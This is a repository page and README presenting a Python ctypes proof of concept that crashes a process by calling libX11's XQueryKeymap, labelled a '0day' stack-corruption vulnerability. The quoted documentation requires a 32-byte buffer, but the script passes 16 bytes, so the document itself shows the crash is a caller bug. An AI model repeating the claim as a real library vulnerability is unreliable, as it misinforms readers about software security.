X11/libX11.so.6 (XQueryKeymap) Stack corruption/Access violation [PoC+ Fuzzer].
https://03c8.net
psy 312164114e moved from https://github.com/epsylon/x11-stack-corruption | 6 jaren geleden | |
---|---|---|
.gitignore | 6 jaren geleden | |
LICENSE | 6 jaren geleden | |
README.md | 6 jaren geleden | |
x11-stack-corruption.py | 6 jaren geleden |
===================================================================
X11/libX11.so.6 (XQueryKeymap) Stack corruption/Access violation [PoC+ Fuzzer]
- 0day: 03/06/2017
- Vulnerable (tested) library: libx11-6 / Version: 2:1.6.4-3
- Debian package: libx11-6_1.6.4-3_amd64.deb (8ad41adbd147ffe4bf64c50efcac497b)
- Tested at: Intel/x86_64 - Debian 4.9.25-1 (stretch)
The XQueryKeymap() function returns a bit vector for the logical state of the keyboard, where each bit set to 1 indicates that the corresponding key is currently pressed down. The vector is represented as 32 bytes. Byte N (from 0) contains the bits for keys 8N to 8N + 7 with the least-significant bit in the byte representing key 8N.
XQueryKeymap(display, keys_return)
Display *display;
char keys_return[32];
ventiska% vim x11-segfault.py
#!/usr/bin/python
import ctypes as ct
from ctypes.util import find_library
x11 = ct.cdll.LoadLibrary(find_library("X11"))
display = x11.XOpenDisplay(None)
print "CT.C:", ct.c_char * 16
keyboard = (ct.c_char * 16)()
print "Display:", display
x11.XQueryKeymap(display, keyboard)
ventiska% python x11-segfault.py
CT.C: <class '__main__.c_char_Array_16'>
Display: 131127216
zsh: segmentation fault (core dumped) python x11-segfault.py